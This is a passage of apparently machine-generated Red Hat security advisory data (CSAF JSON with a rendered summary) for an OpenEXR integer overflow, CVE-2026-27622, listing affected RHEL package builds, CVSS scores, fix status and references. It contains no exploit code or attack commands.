"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12339"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:12340
Vulnerability from csaf_redhat - Published: 2026-04-30 14:33 - Updated: 2026-06-30 04:26Summary
Red Hat Security Advisory: OpenEXR security update
Severity
Important
Notes
Topic: An update for OpenEXR is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details: OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light & Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format.
Security Fix(es):
* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
7.4 (High)
Affected products
Fixed
9 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
9 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12340",
"url": "https://access.redhat.com/errata/RHSA-2026:12340"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12340.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-06-30T04:26:54+00:00",
"generator": {
"date": "2026-06-30T04:26:54+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.0"
}
},
"id": "RHSA-2026:12340",
"initial_release_date": "2026-04-30T14:33:24+00:00",
"revision_history": [
{
"date": "2026-04-30T14:33:24+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T14:33:24+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-30T04:26:54+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product": {
"name": "Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_aus:8.2::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"product_id": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-11.el8_2.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-11.el8_2.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-11.el8_2.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-11.el8_2.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-11.el8_2.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-11.el8_2.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-11.el8_2.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-11.el8_2.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-11.el8_2.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-11.el8_2.1.src as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
